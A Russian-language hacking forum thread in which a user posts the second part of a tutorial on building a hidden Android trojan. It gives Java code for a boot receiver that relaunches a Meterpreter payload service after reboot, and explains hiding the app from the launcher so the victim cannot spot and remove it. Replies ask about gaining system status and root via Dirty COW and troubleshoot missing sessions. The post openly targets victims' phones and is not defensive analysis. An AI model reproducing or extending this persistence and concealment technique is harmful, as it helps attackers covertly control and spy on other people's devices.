 |
20.11.2016, 20:07
|
|
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами:
5033900
Репутация:
0
|
|
Сегодня продолжим собирать скрытый троян на Android.
Прежде чем приступить к прочтению данной статьи настоятельно рекомендую прочитать подготовительную статью о настройках payload и как собирать подписанное апк приложения в android studio из исходников.
Собираем скрытый троян на Andrroid(persistance) Часть I
Этап 1 ( Создаем ресивер)
И так после того как мы научились с вамисобирать нашего вредоноса,плавно перейдем к тому моменту,когда нужно что бы наш троян запускался после перезагрузки андроид устройства.
Первым делом добавим в AndroidManifest.xml ресивер который будет запускаться после удачного запуска устройства и запускать класс StartOnBoot,который мы допишем немножко позже.
Добавим следующие строки в AndroidManifest.xml после закрывающего тега
Код:
Код:
android:label="Start On Boot">
Этап 2 ( Создаем класс StartOnBoot)
Дальше создаем класс StartOnBoot в нашем проекте который будет запускаться после запуска устройства.
Добавляем туда следующий контент:
Код:
Код:
package com.darknode.darknode;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
/**
* Created by CorpOfHack on 20.11.2016.
*/
public class StartOnBoot extends BroadcastReceiver {
@Override
public void onReceive(Context context, Intent intent) {
if(Intent.ACTION_BOOT_COMPLETED.equals(intent.getAction())) {
Intent DarkNodeIntent = new Intent(context,MyIntentService.class);
DarkNodeIntent.addFlags(intent.FLAG_ACTIVITY_NEW_TASK);
context.startService(DarkNodeIntent);
}
}
}
Далее подписываем,собираем,тести руем.
Как видим после перезагрузки телефона,к нам прилетает сессия метерпретер.
Но приложения видно в списке приложений лаунчера. По этому если жертва что то заподозрит то она
его просто удалит и сессия закроется.Нам это же конечно не нужно и мы переходит к 3-му этапу.
Этап 3( Делаем приложения невидимым)
А делается это очень и очень просто.
Нам всего лишь нужно будет удалить активити в AndroidManifest.xml
Для этого просто удалим следующий контент из AndroidManifest.xml:
Код:
И собрать наш апк файл без активити.
Тестируем)
Как видим после перезапуска телефона к нам прилетела метерпретер сессия и приложения не видно в списке приложений лаунчера.
Всем спасибо за внимания.С вами был DarkNode) Надеюсь кому то понравилось |
|
|
10.12.2016, 14:09
|
|
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами:
5033900
Репутация:
0
|
|
xxxcrow сказал(а):
кстати, автор, есть идеи как сделать приложение системным?
еще есть идея получения рута через dirty cow
Думаю дело времени.)
xxxcrow сказал(а):
кстати, автор, есть идеи как сделать приложение системным?
еще есть идея получения рута через dirty cow
На счет коровки на arm процессорах - не знаю, не тестилось пока. В случаи успеха я отпишу.
|
|
|
|
10.12.2016, 16:01
|
|
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами:
5033900
Репутация:
0
|
|
MAdDog719 сказал(а):
~~DarkNode~~ отзовись, не работает троянчик, после выполнения действий второй части, устанавливается приложения и на этом все, сессии нет, в запущенных программах нет. Будем разбиратся) Просто у меня много материала на различные тематики ,которого я планирую изложить в своих постах.И есть две проблемки:
1)Физически отсудствие нужного к-тва времени
2)Каждая новая созданая тема пораждает еще ряд вопросов.
По этому я прошу отнестись с пониманием.У всех есть своя личная жизь,заботы,основная работа и т.д.
Я искренне хочу уделять внимания каждому,но не всегда получается)
Так что я буду стараться писать материал,и так же отвечать на вопросы по мере возможности)
|
|
|
|
06.12.2017, 13:33
|
|
Новичок
Регистрация: 07.09.2017
Сообщений: 0
С нами:
4569495
Репутация:
0
|
|
Почитываю старые статьи на форуме, решил руками пройти этот путь и столкнулся с проблемой:
~~DarkNode~~ сказал(а):
Нам всего лишь нужно будет удалить активити в AndroidManifest.xml
Всё удалив, подписываю и ставлю приложение на реальный телефон. После установки не могу его никак запустить (ярлыков нет, как мы и хотели, кнопка ОТКРЫТЬ после установки неактивна), соответственно и сессия не прилетает... Прогуглил весь инет, но с моими знаниями Android-разработки что-то дельное придумать не получилось... Задача стоит так: запустить приложение после установки, получить сессию и дальше оно должно быть невидимым как и писал ~~DarkNode~~. Если кто поможет советом-буду признателен) |
|
|
|
07.12.2017, 07:21
|
|
Новичок
Регистрация: 07.09.2017
Сообщений: 0
С нами:
4569495
Репутация:
0
|
|
Darius сказал(а):
Значит пробуй компилировать и тестировать на своем телефоне после каждого небольшого изменения в коде. имхо начнешь с того что точно работает - найдешь участок который не работает, а значит есть отправная точка для обдумываний
Да я весь этот путь уже прошел, дело как раз в удаляемых activity, кучу вариаций перепробовал, но результат все равно тот же самый... нужно не удалять полностью activity, а каким-то образом изменить, что у меня как раз не получается... Очень бы хотел погрузиться в азы Android-разработки, но времени не хватает катастрофически(
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
